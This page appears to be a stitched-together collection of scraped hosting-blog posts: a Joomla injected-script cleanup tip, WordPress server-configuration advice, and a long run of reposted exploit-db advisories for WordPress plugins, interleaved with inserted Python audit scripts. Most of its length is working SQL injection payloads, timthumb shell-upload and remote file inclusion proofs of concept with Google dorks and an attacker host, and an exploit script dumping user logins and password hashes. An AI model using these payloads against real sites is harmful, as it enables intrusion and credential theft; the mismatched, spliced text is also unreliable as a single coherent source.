dnnViewState SPAM in Joomla: how to solve it (HOW TO SOLVE THIS)

It is common to see older versions of the Joomla CMS being hammered by a flood of webbots. Among the nastiest defacements going around today are precisely these two (AVAST calls it CLICKJACK-A - TROJAN):


<script type="text/javascript" language="JavaScript">// <![CDATA[
function xViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}xViewState();
// ]]></script>

These usually show up as xVIEWSTATE or DNNVIEWSTATE. The way out for both xViewState and dnnViewState is to locate those terms in the Joomla files; one file in particular tends to be hit, modules/mod_AutsonSlideShow/tmpl/default.php. Remove the (JavaScript) function above from it and the problem is solved!
Rumor has it that WordPress suffers from this as well.
To sweep your code, use Dreamweaver or any IDE (even the terminal) that can search all files for a given term (look for dnnView or xView) and you are done!

Cheers!
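The obfuscation above can be undone statically, without loading the page in a browser. The following is an added example, not part of the original post: it reimplements the script's decoding loop in Python over the array literal shown above and then searches a constructed directory tree for the two marker terms. The function names and sample files are assumptions, and so is the use of index 3 for the tag attribute (the copy above references x[4], which does not exist in a four-element array).

```python
import os
import tempfile

# Array literal copied from the injected script shown above.
ENCODED = [
    "9091968376",
    "8887918192818786347374918784939277359287883421333333338896",
    "877886888787",
    "949990793917947998942577939317",
]

# Search terms suggested in the post, matched case-insensitively.
MARKERS = ("dnnview", "xview")


def decode(parts):
    """Static re-implementation of the script's loop.

    The script walks the array from the last element to the first. On pass
    number a (1-based) every two-digit group d becomes chr(d + 25 - l + a);
    a trailing odd digit is ignored, as in the original loop.
    """
    l = len(parts)
    out = list(parts)
    for a in range(1, l + 1):
        m = parts[l - a]
        shift = 25 - l + a
        out[l - a] = "".join(
            chr(int(m[i:i + 2]) + shift) for i in range(0, len(m) - 1, 2)
        )
    return out


def rendered_markup(parts):
    """Markup the script would write; index 3 for the attribute is assumed."""
    d = decode(parts)
    return "<%s %s>.%s{%s}</%s>" % (d[0], d[3], d[2], d[1], d[0])


def find_infected(root):
    """Return relative paths under root whose text contains a marker term."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read().lower()
            except OSError:
                continue  # unreadable file: skip, do not abort the sweep
            if any(marker in text for marker in MARKERS):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def demo_scan():
    """Constructed site tree: one infected template, one clean file."""
    with tempfile.TemporaryDirectory() as root:
        tmpl = os.path.join(root, "modules", "mod_AutsonSlideShow", "tmpl")
        os.makedirs(tmpl)
        with open(os.path.join(tmpl, "default.php"), "w") as fh:
            fh.write("<?php /* slideshow */ ?>\n"
                     "<script>function xViewState(){}</script>\n")
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'clean'; ?>\n")
        return find_infected(root)


if __name__ == "__main__":
    print(rendered_markup(ENCODED))
    print(demo_scan())
```

The decoded output is a style rule that positions a CSS class 9999px above the page, so when cleaning a template it is also worth searching for elements that carry that class name.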

Blank pages in WordPress: how to fix them?

Steps to fix the problem:

1 – Log in to WHM as root,

2 – Follow the menus and submenus (->) Home -> Service Configuration -> PHP Configuration Editor,

3 – Find the Memory_Limit item; it must be AT LEAST 320mb (yes, there are heavy plugins that consume a lot of RAM),

4 – Find Upload_max_filesize; although it has no effect here, it can bite you at upload time, so leave at least 500MB (our hosting allows 2gb uploads),

5 – Find Max_execution_time and leave at least 600s (for long uploads or plugin processes a long execution time is very important),

6 – Find Max_input_time and leave at least 300s.

Of all the points mentioned, the 2 main ones for fixing the problem are MEMORY_LIMIT and Max_Execution_Time.

Source: http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/

How to fix WordPress white pages on cPanel

I recently posted how to fix a white-page problem in WordPress.

If your WordPress is showing a white page on its home page, this is where your problem ends ;).

To read the article, click the link below:

http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/

Any remote operation in WordPress fails with the error "Ocorreu um erro inesperado" (An unexpected error occurred)

If you are getting the message -> Ocorreu um erro inesperado (unexpected error) <- when trying to do ANYTHING remote from WordPress (install a version, update a plugin, install a plugin, view Akismet, etc.), do not worry, the way out is simple and clear:

1 – Check that outbound port 80 is open in your firewall (it is good to open 443 for SSL as well),

2 – Check that the WordPress folders have the correct permissions (755 under suExec or 777 in DSO without suExec), and that the PHP files have the correct permissions -> 644.

3 – If the two points above are fine, have the server admin run a test: at the top of the /etc/resolv.conf file, add:

nameserver 8.8.8.8

nameserver 8.8.4.4

These two nameservers are public resolvers running on Google's "feeble little" infrastructure.

Security tip: why should I update my WordPress, Joomla, Drupal or any other web content manager?

Icentral recently published a way to reduce the frequency of attacks on sites that use content management systems (better known as CMSs). The tip is simple and easy to understand, and we strongly recommend reading it. To read it, click the link below:

http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

WordPress jetpack plugin SQL Injection Vulnerability

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: WordPress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
*DESCRIPTION
Discovered a vulnerability in  jetpack, WordPress Plugin,
vulnerability is SQL injection.
File:wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

 

Source: http://www.exploit-db.com/exploits/18126/

Multiple WordPress Plugin timthumb.php Vulnerabilities


# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

---
Description
---
The following WordPress plugins reuse a vulnerable version of the timthumb.php library.

By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.

Reference: http://www.exploit-db.com/exploits/17602/

# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php

# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php

# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php

# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php

# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php

# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL

Must first base64 encode the URL.

The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php

# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php

# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php

# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php

# Plugin: Islidex WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php

# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php

# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php

# Plugin: A Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php

# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php

# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php

# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php

# Plugin: User Avatar WordPress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php

Requires register_globals to be enabled and at least one user account to have an avatar directory.

The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php

# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php

Source: http://www.exploit-db.com/exploits/17872/
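Two defensive checks follow from the advisory above: the host of the src URL must be compared strictly, and a thumbnail cache must never hold executable or PHP-bearing files. The code below is an added example, not code from timthumb or from the advisory. It assumes the weak check is a substring match on the host (which is what a domain like blogger.com.evil.com implies); the allow-list, file names and file contents are constructed.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Sample allow-list: "blogger.com" appears in the advisory's PoC, the second
# entry is a constructed placeholder.
ALLOWED_SITES = ["blogger.com", "images.example.org"]

IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")


def host_allowed_substring(url):
    """Weak check (assumed): allowed name may appear anywhere in the host."""
    host = (urlsplit(url).hostname or "").lower()
    return any(site in host for site in ALLOWED_SITES)


def host_allowed_strict(url):
    """Strict check: http(s) only, host is an allowed name or its subdomain."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    if parts.scheme not in ("http", "https") or not host:
        return False
    return any(host == s or host.endswith("." + s) for s in ALLOWED_SITES)


def audit_cache(cache_dir):
    """Flag cache entries a web server could execute or that embed PHP."""
    findings = []
    for name in sorted(os.listdir(cache_dir)):
        path = os.path.join(cache_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        reasons = []
        if name.lower().endswith((".php", ".phtml", ".php5")):
            reasons.append("executable extension")
        if b"<?php" in data.lower():
            reasons.append("PHP open tag in content")
        if reasons and data.startswith(IMAGE_MAGIC):
            reasons.append("image header used as disguise")
        if reasons:
            findings.append((name, reasons))
    return findings


def demo_cache_audit():
    """Build a constructed cache directory and audit it."""
    with tempfile.TemporaryDirectory() as cache:
        samples = {
            # Constructed fixture: image header followed by an inert PHP tag.
            "external_00000000000000000000000000000000.php":
                b"GIF89a" + b"\x00" * 16 + b"<?php /* constructed marker */ ?>",
            # Constructed clean thumbnail.
            "external_11111111111111111111111111111111.gif":
                b"GIF89a" + b"\x00" * 16,
        }
        for name, data in samples.items():
            with open(os.path.join(cache, name), "wb") as fh:
                fh.write(data)
        return audit_cache(cache)


if __name__ == "__main__":
    for url in ("http://blogger.com/a.gif",
                "http://blogger.com.evil.com/poc.php"):
        print(url, host_allowed_substring(url), host_allowed_strict(url))
    print(demo_cache_audit())
```

Running audit_cache over each cache path listed in the advisory shows whether a given install already holds such a file; the lasting fix is an updated library plus a web-server rule that refuses to execute PHP from cache and upload directories.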

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion


# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Source: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion


# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)


PoC

http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)


Vulnerable Code

if (isset($_FILES['wpmm-upload'])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST['abspath']) . 'wp-load.php');

// Handle attachment
WPMiniMail::wpmm_upload();
}

Source: http://www.exploit-db.com/exploits/17868/

WordPress PureHTML plugin


# Exploit Title: WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip
# Version: 1.0.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/pure-html/alter.php
PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
...
if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
...
$action = $_POST['action'];

#delete
if($action == "delete"){
$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Source: http://www.exploit-db.com/exploits/17758/

WordPress yolink Search plugin


# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip
# Version: 1.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php
page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1

---------------
Vulnerable code
---------------
$post_type_in = array();
if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; }
if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; }
$post_type_in = '(' . implode(',', $post_type_in) . ')';
$id_from = $_POST['from_id'];
$batch_size = $_POST['batch_size'];
$post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

Source: http://www.exploit-db.com/exploits/17757/
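Two patterns recur in the advisories above: an include path built from request data (Relocate Upload, Mini Mail Dashboard Widget) and $wpdb->prepare() called with the SQL string as its only argument, so nothing is actually bound (PureHTML, yolink Search). The following added example, which is not code from any of those plugins or advisories, is a small source auditor that flags both patterns in plugin code during review. The rule names are hypothetical, the first three samples are lines copied from this page, and the last sample is a constructed corrected form.

```python
import re

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# include/require whose path expression (up to the ';') contains request data
INCLUDE_RE = re.compile(
    r"\b(?:require|include)(?:_once)?\b[^;]*?" + SUPERGLOBAL, re.I)
PREPARE_RE = re.compile(r"\$wpdb->prepare\s*\(")


def call_args(src, open_idx):
    """Split the call whose '(' is at open_idx into top-level arguments."""
    args, depth, quote, start = [], 0, None, open_idx + 1
    i = open_idx
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1              # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([":
            depth += 1
        elif ch in ")]":
            depth -= 1
            if depth == 0:
                args.append(src[start:i].strip())
                return [a for a in args if a]
        elif ch == "," and depth == 1:
            args.append(src[start:i].strip())
            start = i + 1
        i += 1
    return None                     # unbalanced: truncated snippet


def audit(src):
    """Return sorted (line, rule) findings for one PHP source string."""
    findings = []
    for m in INCLUDE_RE.finditer(src):
        line = src.count("\n", 0, m.start()) + 1
        findings.append((line, "include-from-request"))
    for m in PREPARE_RE.finditer(src):
        args = call_args(src, m.end() - 1)
        # A lone argument means the SQL text was assembled before prepare().
        if args is not None and len(args) == 1:
            line = src.count("\n", 0, m.start()) + 1
            findings.append((line, "prepare-without-values"))
    return sorted(findings)


# Lines copied from the Relocate Upload advisory.
RELOCATE = r'''if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php');
'''

# Lines copied from the PureHTML advisory.
PUREHTML = r'''$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)
'''

# Lines copied from the yolink Search advisory.
YOLINK = r'''$id_from = $_POST['from_id'];
$batch_size = $_POST['batch_size'];
$post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) );
'''

# Constructed corrected form: value bound through %d, fixed include path.
FIXED = r'''$wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}pureHTML_functions WHERE id = %d", $id));
require_once(ABSPATH . 'wp-load.php');
'''

if __name__ == "__main__":
    for name, src in (("relocate", RELOCATE), ("purehtml", PUREHTML),
                      ("yolink", YOLINK), ("fixed", FIXED)):
        print(name, audit(src))
```

The auditor is a pattern match, not taint tracking: it will not catch a request value that is copied into a variable and concatenated into a query later, which is the shape of several of the SQL injection entries further down this page.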

WordPress wp audio gallery playlist plugin


# Exploit Title: WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip
# Version: 0.12 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20

---------------
Vulnerable code
---------------
$table_name = $wpdb->prefix . "posts";
...
if (isset($_GET['post_gallery']))
$query = 'SELECT * FROM `'.$table_name.'` WHERE `post_parent` = \''.$_GET['post_gallery'].'\' AND `post_mime_type` = \'audio/mpeg\' ORDER BY `menu_order` ASC';

Source: http://www.exploit-db.com/exploits/17756/

WordPress Crawl Rate Tracker plugin


# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip
# Version: 2.0.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

---------------
Vulnerable code
---------------
class b3_chartData extends b3_sbTrackingConfig {
public function tracking_bot_report_chart_data() {
...
if($_GET['page_url'] != '') {
$bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` <= '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`");
...
if ($_GET['chart_data']==1) {
...
$chartData = new b3_chartData();
echo $chartData->tracking_bot_report_chart_data();

Source: http://www.exploit-db.com/exploits/17755/

WordPress Event Registration plugin


# Exploit Title: WordPress Event Registration plugin <= 5.4.3 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip
# Version: 5.4.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$id= $_REQUEST['id'];
...
$sql = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'";
$result = mysql_query($sql);

Source: http://www.exploit-db.com/exploits/17751/

WordPress Contus HD FLV Player plugin


# Exploit Title: WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip
# Version: 1.3 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1

---------------
Vulnerable code
---------------
$pid1 = $_GET['playid'];

foreach ($_GET['listItem'] as $position => $item) :
mysql_query("UPDATE $wpdb->prefix" . "hdflv_med2play SET `sorder` = $position WHERE `media_id` = $item and playlist_id=$pid1 ");
endforeach;

Source: http://www.exploit-db.com/exploits/17678/

WordPress File Groups plugin


# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip
# Version: 1.1.2 (tested)

---
PoC
---
http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))

---------------
Vulnerable code
---------------
$fgid = $_GET['fgid'];
...
$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");

http://www.exploit-db.com/exploits/17677/

WP E-commerce plugin


# Exploit Title: WP E-commerce plugin <= 3.8.4 Sql Injection
# Google Dork: inurl:page_id= "Your billing/contact details"
# Date: 18/07/2011
# Author: IHTeam
# Software Link: http://www.getshopped.org/
# Version: 3.8.4
# Tested on: 3.8.4
# Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/
$value ) {
$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE `id` = '$value_id' LIMIT 1";
$form_data = $wpdb->get_row( $form_sql, ARRAY_A );

FIX: Upgrade to version 3.8.5

Bug found by: IHTeam
Simone `R00T_ATI` Quatrini
Marco `white_sheep` Rondini
Francesco `merlok` Morucci
Mauro `epicfail` Gasperini
For GetShopped as their security auditors

This code has been released under the authorization of GetShopped staff.
It will show user_login and user_pass of wp_users table;

Google Dork: inurl:page_id= "Your billing/contact details"
Follow us on Twitter! @IHTeam
*/
function help() {
echo "n";
echo " -------------------WP e-Commerce <= 3.8.4 SQL Injection---------------nn";
echo " How to use: php wp-ecommerce.php host path page_id [table_name]nn";
echo " host = Domain namen";
echo " path = Path of WordPressn";
echo " page_id = Int value of the login page of WP e-commercen";
echo " table_name = Default is wp_usersnn";
echo " Example: php wp-commerce.php www.domain.com /wordpress/ 11 wp_usersnn";
echo " ----------------------------------------------------------------------nn";
}
function exploit($host,$path,$pageid,$table) {
$url = $host.$path."?page_id=".$pageid."&edit_profile=true";
$buggy_code=urlencode("-2' UNION ALL SELECT 2, concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2, 'billingfirstname', null, 0 from ".$table." WHERE '1'='1");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
